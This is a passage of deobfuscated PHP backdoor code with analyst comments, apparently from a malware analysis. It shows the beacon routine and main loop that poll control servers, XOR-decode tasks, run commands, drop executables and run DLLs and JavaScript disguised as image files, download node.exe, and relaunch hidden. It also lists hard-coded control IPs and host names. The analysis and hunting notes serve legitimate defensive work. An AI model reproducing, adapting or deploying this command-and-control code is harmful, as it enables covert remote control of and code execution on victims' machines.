     *             <staging dir>\<8 chars>.jpg and run it with node.exe
     *   other   - write the data to <staging dir>\<8 chars>.txt
     *
     * Hunting pointers: rundll32.exe given a .png path, node.exe under %APPDATA%
     * given a .jpg path, and executables written by php.exe into %APPDATA%.
     *
     * Deobfuscator artefact: echo literals ending in "PHP_EOL" are presumably
     * `"..." . PHP_EOL` in the original sample.
     *
     * @param string $A4YkN Host name or IP address of the control server.
     * @throws Exception On an HTTP status other than 200 or 204, or when EtupZ() fails.
     */
    function mOJ2M($A4YkN)
    {
        global $rst7P, $D_3Y7, $szWC8, $dCN4_;
        // Attach the finished command's output, if there is one, to this beacon.
        if (!(($u7kKd = RCbQd()) !== null)) {
            goto bVOXu;
        }
        $rst7P["cmd"] = $u7kKd;
        bVOXu:
        $uJtGi = EtupZ($A4YkN, A2UXO(json_encode($rst7P, JSON_PRETTY_PRINT)));
        // The output is sent once only.
        unset($rst7P["cmd"]);
        $o0HyG = $uJtGi["content"];
        $Ql4QK = $uJtGi["code"];
        if (!($Ql4QK == 204)) {
            if (!($Ql4QK !== 200)) {
                // Last 4 bytes of the body are the XOR key; the rest is the encoded task.
                $oAl9r = substr($o0HyG, strlen($o0HyG) - 4, strlen($o0HyG));
                $o0HyG = substr($o0HyG, 0, strlen($o0HyG) - 4);
                R7s9B($o0HyG, $oAl9r);
                // Last byte of the decoded task is the task code.
                $miAdf = ord($o0HyG[strlen($o0HyG) - 1]);
                $o0HyG = substr($o0HyG, 0, strlen($o0HyG) - 1);
                $d0PbW = null;
                switch ($miAdf) {
                    case $D_3Y7["CMD"]:
                        echo "CMDPHP_EOL";
                        DEg1T($o0HyG);
                        return;
                    case $D_3Y7["ACTIVE"]:
                        echo "ACTIVEPHP_EOL";
                        // Number of upcoming rounds polled at the short interval (see the main loop).
                        $dCN4_ = unpack("V", $o0HyG)[1];
                        return;
                    case $D_3Y7["AUTORUN"]:
                        echo "AUTORUNPHP_EOL";
                        URHlX();
                        return;
                    case $D_3Y7["OFF"]:
                        echo "OFFPHP_EOL";
                        exit(0);
                    case $D_3Y7["EXE"]:
                        echo "EXEPHP_EOL";
                        $xLjoz = BMlfV() . "\\" . xNkEd(8) . ".exe";
                        file_put_contents($xLjoz, $o0HyG);
                        goto nJLGE;
                    case $D_3Y7["DLL"]:
                        echo "DLLPHP_EOL";
                        // Library is stored with an image extension; the extension does not reflect the content.
                        $yYiH5 = bmlfV() . "\\" . XnkeD(8) . ".png";
                        $xLjoz = "C:\\Windows\\System32\\rundll32.exe";
                        $d0PbW = ecI0T($yYiH5) . " start";
                        file_put_contents($yYiH5, $o0HyG);
                        goto nJLGE;
                    case $D_3Y7["JS"]:
                        echo "JSPHP_EOL";
                        $xLjoz = getenv("APPDATA") . "\\" . "node-v21.7.3-win-x64\\node.exe";
                        // Proceeds when node.exe already exists or the download and extraction succeed.
                        if (!(!file_exists($xLjoz) && !y40SZ("http://nodejs.org/dist/v21.7.3/node-v21.7.3-win-x64.zip", getenv("APPDATA")))) {
                            // Script is stored with an image extension and passed to node.exe as its argument.
                            $d0PbW = BmLfv() . "\\" . XNKed(8) . ".jpg";
                            file_put_contents($d0PbW, $o0HyG);
                            goto nJLGE;
                        }
                        echo "failed install nodejsPHP_EOL";
                        return;
                    default:
                        echo "OTHERPHP_EOL";
                        file_put_contents(BmlfV() . "\\" . XnkeD(8) . ".txt", $o0HyG);
                        return;
                }
                // Shared tail of the EXE, DLL and JS cases: hidden launch through PowerShell.
                nJLGE:
                lfViE($xLjoz, $d0PbW);
                // [PHPDeobfuscator] Implied return
                return;
            }
            throw new Exception("HTTP request failed: " . $Ql4QK);
        }
        echo "204PHP_EOL";
        return;
    }
    // Analyst note: main beacon loop. It never terminates by itself; the only exits
    // visible in this excerpt are the OFF task in mOJ2M() and process termination.
    //
    // Network indicators: the hard-coded IP addresses and host names below are the
    // control endpoints of this sample (one host name sits under trycloudflare.com).
    // Host names are preferred; the IP list is the fallback once the failure counter
    // reaches the threshold.
    //
    // Timing: 10 s between rounds while the ACTIVE counter $dCN4_ is positive or
    // after an error, 300 s otherwise.
    //
    // Deobfuscator artefact: the obfuscated original prints "active_cnt: " . $dCN4_ .
    // PHP_EOL; the two echo lines near the end of the loop were constant-folded by
    // the tool (the "delay:" line presumably printed $LcYWr) and do not show the
    // sample's real output.
    $LcYWr = 10;
    $b2dL6 = ["159.69.187.78", "64.95.12.71", "184.95.51.165"];
    $h0b7d = ["windows-msgas.com", "event-datamicrosoft.live", "varying-rentals-calgary-predict.trycloudflare.com"];
    // Initial endpoint: a random host name, or a random IP if the host list were empty.
    if (count($h0b7d) > 0) {
        $A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)];
        goto sIg7z;
    }
    $A4YkN = $b2dL6[mt_rand(0, 1000) % count($b2dL6)];
    sIg7z:
    // $TZ64Y: failure threshold for switching to the IP list; $dlA_m: failure counter.
    $TZ64Y = 200;
    $dlA_m = 0;
    V3Oj2:
    // Always false: leftover of a `while (true)` loop.
    if (!true) {
        // [PHPDeobfuscator] Implied script end
        return;
    }
    try {
        // Debug trace: current endpoint and failure counter.
        echo $A4YkN . PHP_EOL;
        echo $dlA_m . PHP_EOL;
        moJ2m($A4YkN);
        // Fast polling while the server-set ACTIVE counter lasts, slow polling otherwise.
        if ($dCN4_ > 0) {
            $LcYWr = 10;
            $dCN4_--;
            goto iaT6S;
        }
        $LcYWr = 300;
        iaT6S:
        // Successful round while in fallback mode: after the counter has climbed to
        // threshold + 10, drop it to threshold - 10 and go back to a host name.
        if ($dlA_m >= $TZ64Y + 10) {
            $dlA_m = $TZ64Y - 10;
            if (!(count($h0b7d) > 0)) {
                goto njjkr;
            }
            $A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)];
            njjkr:
            goto RCrAZ;
        }
        // Below the threshold a success resets the counter; at or above it the counter keeps rising.
        if ($dlA_m < $TZ64Y) {
            $dlA_m = 0;
            goto LWgVS;
        }
        $dlA_m++;
        LWgVS:
        RCrAZ:
    } catch (Throwable $Umveq) {
        // Any failure: log it, count it, pick a new endpoint and retry after 10 s.
        echo $pC2k6 . "Error: " . $Umveq->getMessage() . $pC2k6;
        $dlA_m++;
        if ($dlA_m < $TZ64Y && count($h0b7d) > 0) {
            $A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)];
            goto QavQA;
        }
        // Threshold reached (or no host names): fall back to the hard-coded IPs.
        $A4YkN = $b2dL6[mt_rand(0, 1000) % count($b2dL6)];
        QavQA:
        $LcYWr = 10;
        $dCN4_ = 0;
    }
    echo "delay: 10PHP_EOL";
    echo "active_cnt: 0PHP_EOL";
    sleep($LcYWr);
    goto V3Oj2;
}
// Analyst note: this statement sits after the block that holds the beacon loop, so
// it appears to be the path taken on the first start: the script relaunches itself
// in a hidden window with the zip extension enabled and a trailing argument "1",
// then ends. The condition selecting this path is outside this excerpt.
// "/var/www/html/input.php" is presumably __FILE__ folded to the deobfuscation
// service's own path; check the obfuscated original.
// Hunting pointer: php.exe started with "-d extension=zip -d extension_dir=ext".
LfVIE(PHP_BINARY, "-d extension=zip -d extension_dir=ext " . ECi0T("/var/www/html/input.php") . " 1");
return;

